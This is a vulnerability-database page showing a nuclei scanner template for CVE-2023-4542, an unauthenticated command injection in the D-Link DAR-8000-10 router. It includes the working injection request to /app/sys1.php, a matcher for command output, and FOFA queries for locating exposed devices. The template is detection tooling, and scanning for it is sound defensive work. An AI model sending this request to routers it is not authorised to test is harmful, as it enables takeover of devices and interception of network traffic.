Lucene search
K

D-Link DAR-8000-10 - Command Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

D-Link DAR-8000-10 command injection vulnerability in sys1.ph

Related
Refs
Code
id: CVE-2023-4542

info:
  name: D-Link DAR-8000-10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through the id parameter in /app/sys1.php, potentially gaining full control of the D-Link DAR-8000-10 router and intercepting all network traffic.
  remediation: |
    Update D-Link DAR-8000-10 firmware to a patched version that properly sanitizes the id parameter in sys1.php and prevents operating system command injection.
  reference:
    - https://github.com/20142995/sectool
    - https://github.com/tanjiti/sec_profile
    - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md
    - https://vuldb.com/?ctiid.238047
    - https://vuldb.com/?id.238047
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4542
    cwe-id: CWE-78
    epss-score: 0.86533
    epss-percentile: 0.99713
    cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: dar-8000-10_firmware
    fofa-query:
      - body="DAR-8000-10" && title="D-Link"
      - body="dar-8000-10" && title="d-link"
  tags: cve,cve2023,dlink,vkev,vuln

http:
  - raw:
      - |
        POST /app/sys1.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded

        cmd=id

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f90cabb0e0e5333e14279405318c9c3f30ff4b1d19e3b602d1701c32c0fc41f00220511d6476c096f06d930efe46fc071e4b148bf33580f9b37f114582ca7c096e65:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.16.3 - 9.8
CVSS 26.5
CVSS 36.3
EPSS0.86533
61